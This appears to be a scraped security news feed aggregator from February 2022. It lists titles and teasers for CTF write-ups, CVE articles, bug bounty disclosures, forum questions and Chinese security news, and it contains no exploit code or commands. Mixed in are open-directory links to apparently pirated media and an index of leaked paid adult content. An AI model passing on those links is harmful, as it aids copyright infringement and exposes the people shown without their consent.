    Write-ups TryHackMe Challege  ( 3 min )
    Horizontall from HackTheBox — Detailed Walkthrough
    Showing all the tools and techniques needed to complete the box. Continue reading on InfoSec Write-ups »  ( 6 min )
    The find command-TryHackme
    writeup  ( 3 min )
    Angler Exploitation Kit Infection 1 — Malware Traffic Analysis
    In this article, I use NetworkMiner, Wireshark and Brim to analyze a PCAP file that captured network traffic belonging to an Angler…  ( 9 min )
    Server-Side Request Forgery to Internal SMTP Access
    Introduction about SSRF attack can be read on separated medium post Beginner Guide To Exploit Server Side Request Forgery (SSRF)…  ( 3 min )
    Everything you need to know about clickjacking
    A complete guide how to exploit clickjacking and how to prevent it.  ( 3 min )
    [Day 7] Web Exploitation Migration Without Security | Advent of Cyber 3 (2021)
    Today we will learn about NoSql Injection, as you know this is my first time of NoSql Injection, so I was learning a lot from tryhackme.  ( 3 min )
    Day 22 Cross Site Scripting — Part 1 #100DaysofHacking
    Get all the writeups from Day 1 to 21, Click Here Or Click Here.  ( 7 min )
    Host Header Injection Attacks
    Host Header injection is not the type of attack that you would normally find in CTFs or security challenges. However, it is widespread in…  ( 4 min )
    LazyAdmin [TryHackMe Writeup]
    The hacker Aleksey hacks TryHackMe’s LazyAdmin room. They assumed because the admin is “lazy,” that this would be easy. They were so wrong. Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    SecWiki News 2022-02-09 Review
    2022勒索软件和恶意软件报告 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Movies and TV-shows (Good speed)
    submitted by /u/lnsideMyHead [link] [comments]
    Anime and some Music
    submitted by /u/mingaminga [link] [comments]
    Index of /Johnny Cash CDs/
    submitted by /u/mingaminga [link] [comments]
    A lot of software, Games, Film and series in various language
    http://103.222.20.150/ftpdata/ Url: http://103.222.20.150/ftpdata/ Urls file Extension (Top 5) Files Size .mp4 12,912 11.59 TiB .mkv 9,042 9.3 TiB .avi 2,965 1.38 TiB .rar 21 36.18 GiB 16 19.15 GiB Dirs: 16,920 Ext: 59 Total: 46,363 Total: 22.4 TiB Date (UTC): 2022-02-08 23:34:44 Time: 01:48:31 Speed: 0.00 MB/s (0.0 mbit) Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.1](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]  ( 1 min )
  • Open

    CVE-2022–22718: Windows Print Spooler Privilege Escalation
    Article URL: https://research.ifcr.dk/spoolfool-windows-print-spooler-privilege-escalation-cve-2022-22718-bf7752b68d81?gif=true Comments URL: https://news.ycombinator.com/item?id=30273774 Points: 3 # Comments: 1  ( 11 min )
    CVE-2022-21703: cross-origin request forgery against Grafana
    Article URL: https://jub0bs.com/posts/2022-02-08-cve-2022-21703-writeup/ Comments URL: https://news.ycombinator.com/item?id=30270751 Points: 1 # Comments: 0  ( 10 min )
  • Open

    Simply GeoEstimation — OSINT Challenge 13
    On Dec 20, 2021, OSINT Dojo shared a OSINT quiz with us. The objective was simple. We had to figure out where the photo was taken… Continue reading on Medium »  ( 1 min )
    Walkthrough — Hacktoria: Geolocation 10
    In this article I will explain how to solve Hacktoria’s Geolocation 10 challenge. However, I must give a quick disclaimer first. I already… Continue reading on Medium »  ( 5 min )
  • Open

    Can deleted WhatsApp conversations from an iPhone be recovered without backup?
    I deleted a very important conversation on WhatsApp 2 days ago. The iPhone 12 (running iOS 15.x) in question has been powered off and hasn't been used since. I understand that WhatsApp saves a backup copy in Android phones' local memory everyday at 2am and erase them every 7 days, however I can't find anything about iOS devices. To make matter worse, I deleted the conversation around 7pm, so before the local backup could trigger at 2am. Is there any chance to get this conversation back without any backup? And what would my chances be with a Cellebrite device? submitted by /u/Strangedreamest [link] [comments]  ( 2 min )
  • Open

    信息安全技术 移动互联网应用程序(App)生命周期安全管理指南(征求意见稿)发布
    《征求意见稿》共六章,分别是范围、规范性引用文件、术语和定义、缩略语、概述和生命周期管理,对安全需求、安全建议、安全管理等给出了指导意见。
    FreeBuf早报 | “漫游螳螂”正瞄准欧洲;沃达丰葡萄牙分公司遭大规模网络攻击
    沃达丰葡萄牙分公司遭受网络攻击,导致该国通讯和电视服务严重中断。  ( 1 min )
    慢雾:美国执法部门破获 2016 年 Bitfinex 被黑案件细节分析
    一个疑点:真正攻击 Bitfinex 的盗币黑客是谁?  ( 1 min )
    NetWalker勒索软件成员被判80个月监禁
    近期,加拿大男子Sebastian Vachon-Desjardins因参与NetWalker勒索攻击,被判处6年零八个月监禁。
    关于SSRF和多种绕过方式
    SSRF漏洞形成的原因主要是服务器端所提供的接口中包含了所要请求内容的URL参数,并且未对客户端所传输过来的URL参数进行过滤。  ( 1 min )
    Puma遭遇勒索攻击致数据泄漏、微软修复48个安全漏洞|2月9日全球网络安全热点
    运动服装制造商Puma在2021年12月对其北美劳动力管理服务提供商之一Kronos发起勒索软件攻击后,遭到数据泄露。
    全球工业网络安全状况调查
    【编者按】工业组织在2021年面临重大挑战。对佛罗里达州Oldsmar供水设施、Colonial管道和JBS的网络攻击,以及Solar  ( 1 min )
    “漫游螳螂”恶意软件触角伸向欧洲
    犯罪分子能够利用偷来的照片以其他方式获得钱财,如敲诈或性骚扰等。  ( 1 min )
    以色列监控公司 QuaDream遭曝光
    “据五位知情人士透露,以色列监控公司 NSO Group 在 2021 年利用苹果软件中的一个漏洞 侵入 iPhone,同时也被一家竞争公司滥用。” 根据路透社发表的文章,“有人透露这家名为的QuaDream 是一家规模较小、知名度较低的以色列公司,它还为政府客户开发智能手机黑客工具。”QuaDream是由以色列前军官 Ilan Dabelstein 和两名前 NSO 员工 Guy Geva 和  ( 1 min )
    微软禁用ms-appinstaller 协议,以阻止恶意软件传播
    微软宣布已在Win10/11系统中暂时禁用MSIX应用程序安装器的ms-appinstaller 协议,以防被恶意软件滥用。
    请及时更新,微软2月修复48个重要漏洞,1个零日漏洞
    2022年2月8日,微软发布了一系列的漏洞补丁,共修复48 个漏洞,以及一个零日漏洞。  ( 1 min )
    《金融标准化“十四五”发展规划》发布,强化金融网络安全标准防护
    《规划》提出要强化金融网络安全标准防护。健全金融业网络安全与数据安全标准体系。 建立健全金融业关键信息基础设施保护标准体系,支持提升安全防护能力。

  • Open

    Hypothetical incident: what would be an appropriate response?
    Hello AskNetSec! I am curious what you all would consider an appropriate response to an incident such as a user reporting that they've clicked on a phishing link. Personally, I believe it is appropriate to probe about what popped up after clicking the link, whether or not they entered any of their information, and whether or not they notice any abnormal behavior on their computer after clicking on the link. After that, have the user change their password as a precaution and move on begin monitoring. I figure between the questions assuring they did nothing more than click, a password change, existing security controls such as CrowdStrike, and monitoring for abnormal behavior, there isn't much more that makes sense to do. Others on my team seem to think it's worth downloading Microsoft Safety Scanner and running a full system scan, which I argue doesn't hurt, but also probably doesn't add much value unless something is seen on the user's computer that would prompt further investigation. Especially since I can't imagine Microsoft Safety Scanner is going to pick up on something that CrowdStrike does not. Understandably, different companies may expect different responses based on established policy and regulations. But I want to leave it kind of open ended and see what other IT and security professionals believe is appropriate for these types of incidents? How deep do you go for these types of things? submitted by /u/unseenspecter [link] [comments]  ( 2 min )
    IR Retainer things to consider
    When looking to purchase Incident Response Retainers what are things you wish you knew prior to purchasing? Is there any gotchas that should be considered? What can I learn from you in your experience with this? submitted by /u/gnomeparadox [link] [comments]  ( 3 min )
    What level of knowledge should Tier 1 SOC analysts have to enter the job?
    Each of the sub-branches of cyber security is like a different world for itself, there is no end when you want to learn. For example, we agree that it is necessary to have knowledge about malware analysis for the position of security analyst. However, if you try to improve yourself in malware analysis, you can probably only work on malware analysis for years. At this point, many people do not know how much technical knowledge required to get started. For this reason, many people can not be accepted to the job due to an insufficient level in job applications, or the starting process may take longer as people spends too much time on training and develops technical knowledge more than the level required to start the job. In your opinion, what should be the technical level required to start working in the security analyst position? submitted by /u/umuttosun [link] [comments]  ( 2 min )
    Infosec as "just" a job?
    Hi, I'm a CS student who's been learning a mishmash of basics to get into infosec — some assembly, wifi cracking, sql injection, etc under my belt, just the very basics, but I'm kind of overwhelmed by how... Enthusiastic and into it everyone seems to be. I'm not sure I'm "built" for it either, since I can't relate to the culture about stuff like lockpicking and causing trouble in school networks and stuff. Never done any social engineering in my life. I'm more of a science guy, and I went into CS because I'm aiming for a practical job that's in STEM. That's it, really. I'm willing to learn things in my spare time but I can't dredge up the same intense curiosity I see in people I've seen both IRL and online in security. Will I drown? Should I look elsewhere? submitted by /u/Wild_Rutabaga_3099 [link] [comments]  ( 4 min )
    Malware playbooks
    I was wondering what you're malware playbooks look like. We got a bunch of malware alerts today for items that were deleted by the av. It caused some internal discussions on common practices. submitted by /u/xX_s0up_Xx [link] [comments]  ( 1 min )
    How to become a pen tester ?
    submitted by /u/AlmightyMemeLord404 [link] [comments]  ( 3 min )
    Any insights on purchasing Palo Alto firewalls for home/lab use?
    I see a wide range of pricing for the PA-200 through 400 models and am not sure why. Anybody else running a small PAN device in their homelab have insight on purchasing a refurb and maybe one or two subscriptions setup on it? Is it best to look for an authorized dealer or is eBay safe? submitted by /u/EnterNam0 [link] [comments]  ( 1 min )
  • Open

    Kubernetes for pentesters
    There’s countless article on hacking kubernetes clusters but is there any research or repos on how you can use k8s for pen testing? One idea is using a cluster in which each node is a “person” that has access to a specific machine or to a different machine. I’m open to other ideas regarding the usage of k8s to improve hacking automation submitted by /u/sirlordjax [link] [comments]  ( 1 min )
    Invisible Sandbox Evasion - Check Point Research
    submitted by /u/dmchell [link] [comments]
    Helping users stay safe: Blocking internet macros by default in Office
    submitted by /u/dmchell [link] [comments]  ( 1 min )
  • Open

    Some OS ISO (Fast Download)
    Some Linux and Windows (Some in Pt/de/ru/en) ISO, The server has a pretty decent speed Url: https://root3.minerswin.de/ISO/ Urls file Extension (Top 5) Files Size .iso 102 195,47 GiB .zip 50 60,06 GiB .xz 18 14,95 GiB .ova 4 11,6 GiB .7z 2 3,7 GiB Dirs: 71 Ext: 12 Total: 323 Total: 288,59 GiB Date (UTC): 2022-02-08 23:22:22 Time: 00:00:03 Speed: 46,65 MB/s (373,2 mbit) Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.1](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]
    Random Stuff in French
    http://5.196.72.204/ Url: http://5.196.72.204/ Urls file Extension (Top 5) Files Size .mkv 141 459,53 GiB .avi 99 70,71 GiB .mp4 533 51,46 GiB .tar 1 28 GiB .m2ts 33 27,8 GiB Dirs: 532 Ext: 58 Total: 4 362 Total: 683,72 GiB Date (UTC): 2022-02-08 23:08:45 Time: 00:00:07 Speed: 11,11 MB/s (88,9 mbit) Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.1](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]
    French Film & Series
    http://www.zoppello.fr/download/ Url: http://www.zoppello.fr/download/ Urls file Extension (Top 5) Files Size .mkv 937 668,57 GiB .avi 66 68,38 GiB .mp4 61 22,63 GiB .ts 5 17 GiB .flv 17 7,07 GiB Dirs: 187 Ext: 15 Total: 1 405 Total: 790,34 GiB Date (UTC): 2022-02-08 23:07:02 Time: 00:00:04 Speed: 11,05 MB/s (88,4 mbit) Created by [KoalaBear84's OpenDirectory Indexer v2.3.0.1](https://github.com/KoalaBear84/OpenDirectoryDownloader/) submitted by /u/VoXaN24 [link] [comments]
    South Park
    Hey everyone looking for South Park season downloads thanks in advance submitted by /u/Los-Aragon [link] [comments]
  • Open

    SharpSQL: C# MS SQL enum and exploitation
    submitted by /u/IamaCerealKilla [link] [comments]
    SpoolFool: Windows Print Spooler Privilege Escalation (CVE-2022–22718)
    submitted by /u/ly4k_ [link] [comments]  ( 1 min )
    How Docker Made Me More Capable and the Host Less Secure
    submitted by /u/jat0369 [link] [comments]
    AWS Cloud Security Challenges
    submitted by /u/0xdeadbeef0000 [link] [comments]
    PPE - Poisoned Pipeline Execution. Running malicious code in your CI, without access to your CI
    submitted by /u/Hefty_Knowledge_7449 [link] [comments]  ( 1 min )
    How open-source packages handle releasing security fixes
    submitted by /u/Jazzlike-Vegetable69 [link] [comments]  ( 1 min )
  • Open

    VSCode Remote Development Extension Remote Code Execution Vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21991 Comments URL: https://news.ycombinator.com/item?id=30262516 Points: 8 # Comments: 0
  • Open

    100 Days of Hacking — DAY 4
    Objectives of day 4 : Continue reading on Medium »  ( 1 min )
    SQL Injection, Reflected XSS and Information Disclosure in one subdomain in just 10 minutes
    Hi there, 7odamo is here. First of all this is my first write-up and i am still beginner, So i might write something wrong,Then it’s… Continue reading on Medium »  ( 3 min )
    100 DAYS OF HACKING — DAY 3
    woohoo, sup fellow hackers. it’s day 3 / 100 we have a long way to go. Continue reading on Medium »  ( 1 min )
    Securing Lichess one move at a time
    Hi there, thanks for stopping by and taking some time to read my blog post about how I helped secure my favorite chess playing which if… Continue reading on Medium »  ( 1 min )
    Privilege Escalation Using Wildcard Injection | Tar Wildcard Injection |
    This blog is about how to use Wildcard Injection to escalate privileges to root in Unix-like OS. Continue reading on System Weakness »  ( 2 min )
    Full Account takeover (ATO) — a tale of two bugs
    Hi everyone, I hope we’re all having a swell day. Before I jump into today's bug report, I’d like to express my sincerest gratitude for… Continue reading on Medium »  ( 2 min )
    Registrations Open for IWCON 2022 — the Online International Cybersecurity Conference
    Book your seats today! Continue reading on InfoSec Write-ups »  ( 2 min )
    APWine Incorrect Check of Delegations Bugfix Review
    In the Web2 world, a simple oversight in the code doesn’t always result in a huge breach of data (of course, sometimes they do). In Web3… Continue reading on Immunefi »  ( 4 min )
    2FA Bypass Techniques
    Hello lads, it’s me again. Let’s discuss different techniques about bypassing 2FA. Continue reading on Medium »  ( 2 min )
    You Can Takeover Any GOOGLE Account !
    Thank you for taking the time to read about “ You Can Takeover Any GOOGLE Account ! ” Continue reading on Medium »  ( 2 min )
  • Open

    What is OSINT(Part 2): Dangers of Oversharing
    This article was written in collaboration with Aardwarewolf Continue reading on Medium »  ( 7 min )
    What is OSINT? (Part 2)
    The dangers of oversharing Continue reading on Medium »  ( 8 min )
  • Open

    Something's Amiss . . .
    Hello everyone...super noob alert: I'm taking a digital forensics class and rather than using the virtual lab decided to do some memory analysis on my machine. Since I know little about computers and even less about what I'm looking at, maybe I'm being paranoid, but maybe you can shed some light? As I don't know the email addresses, nor do email addresses like "stealerbyframe@mail.ru", "360saftfirehackr@qq.com", or my favorite "pizda@qq.com"--inspire confidence, those addresses raised some alarms. I used FTK Imager to do a memory dump on my system. I then used Bulk Extractor to organize the data a bit and the screen shot is some emails I found in the email.txt file result. Why, for example, are they in my computer's memory!? https://preview.redd.it/9orfvtravmg81.png?width=1326&format=png&auto=webp&s=65d81163bcd0e35d26a7cc2c88a5025762e36d9a https://preview.redd.it/80togtravmg81.png?width=509&format=png&auto=webp&s=3d14c00dbe7395beb8e682bd2fe0cc50e7d66277 submitted by /u/Funny-Appearance9167 [link] [comments]  ( 2 min )
    Beginner-level mini-course on starting a new investigation with Autopsy. Covers data organization, documentation, new case creation, ingest modules, basic analysis workflow, and exporting reports.
    submitted by /u/DFIRScience [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-02-08 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Beaconfuzz - A Journey into #Ethereum 2.0 Blockchain Fuzzing and Vulnerability Discovery
    submitted by /u/pat_ventuzelo [link] [comments]
    Top 6 Books to learn the Rust Programming Language in 2022
    submitted by /u/pat_ventuzelo [link] [comments]
  • Open

    Cross-site Scripting (XSS) - Stored | forum.acronis.com
    Acronis disclosed a bug submitted by quadrant: https://hackerone.com/reports/1161241 - Bounty: $50
    Stored Cross-site Scripting on devicelock.com/forum/
    Acronis disclosed a bug submitted by h4x0r_dz: https://hackerone.com/reports/1122513 - Bounty: $50
    Subdomains takeover of register.acronis.com, promo.acronis.com, info.acronis.com and promosandbox.acronis.com
    Acronis disclosed a bug submitted by ashmek: https://hackerone.com/reports/1018790
    Attacker Can Access to any Ticket Support on https://www.devicelock.com/support/
    Acronis disclosed a bug submitted by h4x0r_dz: https://hackerone.com/reports/1124974 - Bounty: $250
    Information Disclosure via ZIP file on AWS Bucket [http://acronis.1.s3.amazonaws.com]
    Acronis disclosed a bug submitted by h4x0r_dz: https://hackerone.com/reports/1121771
  • Open

    2021年全球工业网络安全态势报告
    六方云结合2021年50篇安全态势周刊内容,详细分析全球工业安全现状,多方位感知工业安全态势,为工业安全相关责任人员提供有效的参考。  ( 1 min )
    无回显条件下的命令执行判断和利用方式研究
    渗透测试、漏洞挖掘或安全研究的过程中,我们会遇到很多无回显的命令执行点。  ( 1 min )
    FreeBuf早报 | Meta 威胁退出欧洲;网上没有免费“红包”
    Meta 威胁称,如果欧盟不允许该公司的美国运营、应用程序和数据中心分享欧盟用户数据,将考虑退出欧洲。  ( 1 min )
    X站钓鱼邮件应急响应案例分析
    应急响应文章很多,但如何使用SANS、NIST框架模型落地应急响应文章略少,仅以个人观点针对当前X站钓鱼邮件案例进行简单模型化分析  ( 1 min )
    服务全球100强的公司Morley遭勒索攻击,泄露大量用户信息
    泄露的数据类型包括:姓名、地址、社会安全号码、出生日期、客户识别号码、医疗诊断和治疗信息以及健康保险信息。
    上海首份《企业数据合规指引》发布
    《指引》共六章三十八条,主要对企业的数据合规管理架构与风险识别处理规范作出了规定。
  • Open

    CVE-2021-4160: OpenSSL carry propagation bug in some TLS 1.3 default curves
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2021-4160 Comments URL: https://news.ycombinator.com/item?id=30256773 Points: 2 # Comments: 0  ( 4 min )
  • Open

    Registrations Open for IWCON 2022 — the Online International Cybersecurity Conference
    Book your seats today!  ( 2 min )
  • Open

    Registrations Open for IWCON 2022 — the Online International Cybersecurity Conference
    Book your seats today!  ( 2 min )

  • Open

    Lots of music
    Mostly 320kbit mp3. Complete collections. Great KISS folder. http://nordserv.no/english/ submitted by /u/inoculatemedia [link] [comments]
    More music some flac
    https://www.aidd.org/conspiracy/03/sounds/mp3s/ submitted by /u/inoculatemedia [link] [comments]
    Rap and R&B
    http://bawkawajwanw.com/Music/ submitted by /u/inoculatemedia [link] [comments]
    QSL.NET 's Old Radio Client Programming Software CPS RSS (Including GR1225 RSS 4.0)
    submitted by /u/Goldmann_Sachs [link] [comments]  ( 1 min )
  • Open

    February Newsletter
    The following is a monthly conglomeration of articles, sites and techniques that we have found both interesting, and beneficial, to our… Continue reading on Medium »  ( 2 min )
    Why Is Iceland So Small- OSINT Challenge 12
    On Jan 17, 2022, OSINT Dojo shared a new OSINT quiz with us. The objective was simple. We had to figure out where the photo was taken… Continue reading on Medium »  ( 1 min )
  • Open

    Linux Privilege Escalation: PwnKit (CVE 2021-4034)
    Introduction Team Qualys discovered a local privilege escalation vulnerability in PolicyKit’s (polkit) setuid tool pkexec which allows low-level users to run commands as privileged users. The post Linux Privilege Escalation: PwnKit (CVE 2021-4034) appeared first on Hacking Articles.  ( 5 min )
  • Open

    Tailscale CVE: TS-2022-001
    Article URL: https://tailscale.com/security-bulletins/#ts-2022-001 Comments URL: https://news.ycombinator.com/item?id=30248447 Points: 2 # Comments: 0  ( 1 min )
    CVE-2021-39137 – a Golang security bug that Rust would have prevented
    Article URL: https://research.nccgroup.com/2022/02/07/a-deeper-dive-into-cve-2021-39137-a-golang-security-bug-that-rust-would-have-prevented/ Comments URL: https://news.ycombinator.com/item?id=30244773 Points: 4 # Comments: 0  ( 7 min )
  • Open

    How we could have listened to anyone’s call recordings.
    About Us: Detect, Prioritize and Negate Cloud Security Threats that matter! https://pingsafe.com Continue reading on Medium »  ( 3 min )
    Rce via Image (jpg,png) File Upload..!
    Remote code execution (RCE) is a class of software security flaws/vulnerabilities. RCE vulnerabilities will allow a malicious actor to… Continue reading on Medium »  ( 1 min )
    Subdomain Takeover
    What is subdomain? Continue reading on Medium »  ( 3 min )
    How to Install BFAC on Kali Linux
    BFAC (Backup File Artifacts Checker): Tool to check backup artifacts that may disclose the web-application’s source code | Sensitive… Continue reading on Medium »  ( 1 min )
    The story of Scamster Tony Capo: Aggressive Cyber Warfare Specialist
    This scamster aka https://tonycapo.net/ or whatever his real name is, has been scamming people since 2019, There are multiple bad reviews… Continue reading on Medium »  ( 1 min )
    How We “Forced” Our Client To Fix A Low Severity Security Bug And Still Got Appreciated!
    We at DefCore Security intend to provide great visibility to clients while working on the pentest engagement. We give our clients the… Continue reading on Medium »  ( 3 min )
    Error: Please run “shodan init ” before using this command
    Hello All, if you ever tried running shodan in Kali Linux and got shodan init error. Then keep reading….! Continue reading on Medium »  ( 1 min )
    Is my organization ready for a bug bounty program?
    Bug Bounty programs can be a great thing for both the organization, as well as for the hacker. The question is, can every organization… Continue reading on Medium »  ( 3 min )
    RCE in .tgz file upload
    Cre: Machevalia’s Blog Continue reading on Medium »  ( 2 min )
    CEH Practical Exam Guide
    Exam Information Continue reading on Medium »  ( 2 min )
  • Open

    How to Make Package Signing Useful
    submitted by /u/dlorenc [link] [comments]
    SHA-256 explained step-by-step visually
    submitted by /u/jandrusk [link] [comments]  ( 2 min )
    Qbot Likes to Move It, Move It
    submitted by /u/TheDFIRReport [link] [comments]
    A deeper dive into CVE-2021-39137 – a Golang security bug that Rust would have prevented
    submitted by /u/digicat [link] [comments]  ( 1 min )
    Shadow Credentials
    submitted by /u/netbiosX [link] [comments]
    UEFI firmware vulnerabilities affect at least 25 computer vendors
    submitted by /u/TryptamineEntity [link] [comments]  ( 1 min )
    Linux Persistence using Systemd Generators. They will run early at boot and can be used to create services and disable other services before they start.
    submitted by /u/dashboard_monkey [link] [comments]  ( 1 min )
    #Phishing like early 90's. Spoofing emails when DMARC isn't available or commonly known as "SPF-BYPASS".
    submitted by /u/intruderK [link] [comments]  ( 1 min )
  • Open

    Application level DOS at Login Page ( Accepts Long Password )
    Reddit disclosed a bug submitted by e100_speaks: https://hackerone.com/reports/1168804
    Leaking sensitive information through JSON file path.
    Nextcloud disclosed a bug submitted by rohitburke: https://hackerone.com/reports/1211061
  • Open

    SecWiki News 2022-02-07 Review
    ML-DOCTOR:对机器学习模型推理攻击的全局性研究 by ourren 黑灰产识别与溯源 by ourren 侠盗猎车 -- 玩转滚动码(中) by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Email platform Zimbra issues hotfix for XSS vulnerability under active
    Article URL: https://portswigger.net/daily-swig/email-platform-zimbra-issues-hotfix-for-xss-vulnerability-under-active-exploitation Comments URL: https://news.ycombinator.com/item?id=30246174 Points: 1 # Comments: 0  ( 4 min )
  • Open

    Qbot Likes to Move It, Move It
    submitted by /u/TheDFIRReport [link] [comments]  ( 1 min )
  • Open

    Shadow Credentials
    submitted by /u/netbiosX [link] [comments]
    KillDefenderBOF: Beacon Object File PoC implementation of KillDefender
    submitted by /u/5ub34x_ [link] [comments]  ( 1 min )
    #Phishing like early 90's. Spoofing emails when DMARC isn't available or commonly known as "SPF-BYPASS".
    submitted by /u/intruderK [link] [comments]
  • Open

    Shadow Credentials
    Microsoft has introduced Windows Hello for Business (WHfB) to replace traditional password based authentication with a key based trust model. This implementation uses PIN or… Continue reading → Shadow Credentials  ( 7 min )
    Shadow Credentials
    Microsoft has introduced Windows Hello for Business (WHfB) to replace traditional password based authentication with a key based trust model. This implementation uses PIN or… Continue reading → Shadow Credentials  ( 7 min )
  • Open

    FreeBuf早报 | DHS将着力解决log4j漏洞问题;教育行业成2021年网络攻击重灾区
    该软件的广泛使用和易于利用使它成为一个极其严重的漏洞,而DHS的最佳实践是集中精力对log4j软件库和相关补救过程中的漏洞进行审查。  ( 1 min )
    PayBito 加密货币交易所遭受网络攻击,大量数据信息被盗
    LockBit勒索软件团伙称从PayBito加密货币交易所窃取了大量客户数据。  ( 1 min )
    多趟航班延误!瑞士Swissport空港服务公司遭勒索软件攻击
    瑞士国际空港服务有限公司(Swissport International Ltd.)遭勒索软件攻击,导致多趟航班延误。
    冬训营丨移动终端高级威胁的新挑战与对抗发现
    据公开数据统计,至2021年中,移动互联网用户规模已达到10.07 亿。  ( 1 min )
    冬训营丨威胁框架的新进展
    本文从三个方面,即新内容、新方向和新力量,介绍与分析了2021年度威胁框架ATT&CK在研究与应用方面的新进展。  ( 1 min )
    冬训营丨商用密码应用建设解决方案
    随着数字化、网络化、智能化的深入发展,大数据、云计算、区块链、AI等技术的变革,不断催生出各行业的新业态。  ( 1 min )
    微软去年拦截了数百亿次暴力破解和网络钓鱼攻击
    自2021年1月到2021年12月,微软阻止了超过256亿次 Azure AD暴力验证攻击,并拦截了357亿封网络钓鱼电子邮件。  ( 1 min )
  • Open

    I'm feeling like I'm underpaid at $60k CAD in Montreal Canada
    Hi everyone, I'm currently working as an information security analyst for this non-tech company here in Montreal Canada for 9 months already. I have 7 years of total work experience (5 years customer service, 2 years as an IT tech + SysAdmin). I have the Azure Security Engineer Associate AZ-500 certification. I'm currently paid 60k CAD Since I'm the only security analyst in my organization, I'm the only one leading multiple security projects. My company have multiple divisions across Canada, South America and Asia with around 1000 employees. My first project after landing the job was the deployment of Bitlocker on every laptop and modern desktop in the company. One of the big project I'm currently running alone is the architecting and deployment of MFA across all employees and all our divisions + deployment of a new VPN solution for employees, with Multi Factor Authentication on every VPN connection. My biggest duties outside of projects are threat detection and response, training and security awareness to employees, and patching old and vulnerable systems. I think I was lucky to find a security role with no prior security experience, but I feel like I'm underpaid. And my annual evaluation is coming in a month. Should I look around for jobs that could pay me better? Should I meet with my manager and ask for a raise ? Thank you Edit: added "architecting MFA" submitted by /u/hey_its_meeee [link] [comments]  ( 2 min )
    Do penetration testers ever get called in at 3AM?
    submitted by /u/notburneddown [link] [comments]  ( 3 min )

  • Open

    The devil is in the details [Authentication Bypass]
    Hello, I’m Taha. Today, I’ll go over one of the vulnerabilities I was rewarded for last month. I hope you enjoy this write-up. Continue reading on Medium »  ( 1 min )
    How To Start BBJ (Bug Bounty Journey)
    Hello Hacker’s & Security Guys Thanks for Your Support So Continue reading on Medium »  ( 1 min )
    My Pentest Log -5-
    Greetings Everyone from Sancta Sophia, Continue reading on Medium »  ( 2 min )
    Penetration Testing vs Bug Bounty
    When you have a fixed payload list, a fixed methodology, a fixed approach, then effectively penetration testing and bug bounty hunting are… Continue reading on Medium »  ( 2 min )
    How I found a critical P1 bug in 5 minutes using a cellphone — Bug Bounty
    Hello Hackers, I’m MrEmpy I’m 16 and welcome to my first article about a critical bug I found on mobile. Continue reading on Medium »  ( 1 min )
    First Bug Bounty Program found CORS (Cross Origin Resource Sharing ) Misconfiguration
    Hello fellow Security researchers and beginners , in this blog I will be explaining the CORS vulnerability and how I found a potential… Continue reading on Medium »  ( 2 min )
  • Open

    End-2-End file transfer
    Hi, I want to download a file directly from a friend computer, what's the most secure way to do it with an encrypted tunnel ? submitted by /u/Spare_Prize1148 [link] [comments]  ( 1 min )
    GRC - recommend reading material
    Will be starting a new role in GRC in a couple of months time and wanted to see if anyone great reading sources to help hit the ground running. Currently reading the business minded CISO which has helped quite a bit! submitted by /u/SecMac [link] [comments]  ( 1 min )
    Book Recommendations for Memory Level Security
    Hi, I would like to ask a book advice to understand how operating systems memory level operations work. For example i want to understand how stack and heap level exploits work on both Windows and Linux systems and what security measures this operating systems have to prevent attacks like heap buffer overflow, process injection and hijacking etc. Where should I start to understand memory level operations on operating systems? Should I know programming languages like C because OSs mostly written in C? submitted by /u/execute_sh [link] [comments]  ( 1 min )
    How safe are Password Managers Actually?
    Hi, both Bitwarden and 1password are open source. Can anyone in the backend team has a way to look at our passwords? I mean the devs who made those apps must have a way whatsoever? Being double sure before using. What are your thoughts? submitted by /u/TheRealistDude [link] [comments]  ( 3 min )
    How do blackhats monetize stolen accounts without being caught?
    Suppose a blackhat has gotten a victim's e-mail, banking, PayPal etc. account infos, how do they monetize this information without leaving a trail leading back to them? I can't make sense of this. Thanks. submitted by /u/DirectionProof710 [link] [comments]  ( 1 min )
  • Open

    Arbitrary file read in Rocket.Chat-Desktop
    Rocket.Chat disclosed a bug submitted by sectex: https://hackerone.com/reports/943737
  • Open

    My Pentest Log -5-
    Greetings Everyone from Sancta Sophia, Continue reading on Medium »  ( 2 min )
  • Open

    My Pentest Log -5-
    Greetings Everyone from Sancta Sophia, Continue reading on Medium »  ( 2 min )
  • Open

    Miscellaneous NSFW Content from Patreon, Onlyfans, Snapchat, Fansly etc..
    https://theporngrid.com/Uploads/Media/ There's a combination of images and videos from a bunch of different original sources, mostly onlyfans and the like. Everything here is used by ibradome.com (NSFW) for their embedded content I indexed the files: https://gist.githubusercontent.com/RedDeadRandy/bda22a2b6014315597df2259a03815e2/raw/fe1ba95b5d2ec0d2a3e7ebcce96db21c1eda0152/theporngrid_files.txt Some of it is watermarked to find out who the person is while others are a crapshoot. submitted by /u/TattedUp [link] [comments]
    /VIDEOS about China. mostly unexplored PD. to be safe NSFW
    submitted by /u/thats_dumberst [link] [comments]
    Large directory of film scripts, different formats
    http://nldslab.soe.ucsc.edu/charactercreator/film_corpus/film_20100519/all_imsdb_05_19_10/ submitted by /u/inoculatemedia [link] [comments]
    funeral parlour decor and accessories
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    GUARDARA is now free for independent security researchers and non-commercial open-source projects
    submitted by /u/JohnKeymanUK [link] [comments]
  • Open

    Walkthrough — Hacktoria: Geolocation 08
    Back again with another Hacktoria geolocation walkthrough, this time on challenge 08. I must confess that took image took me a bit longer… Continue reading on Medium »  ( 7 min )
  • Open

    OSCP preparation - Buffer Overflow: VANILLA EIP OVERWRITE AND SEH
    submitted by /u/CyberMasterV [link] [comments]
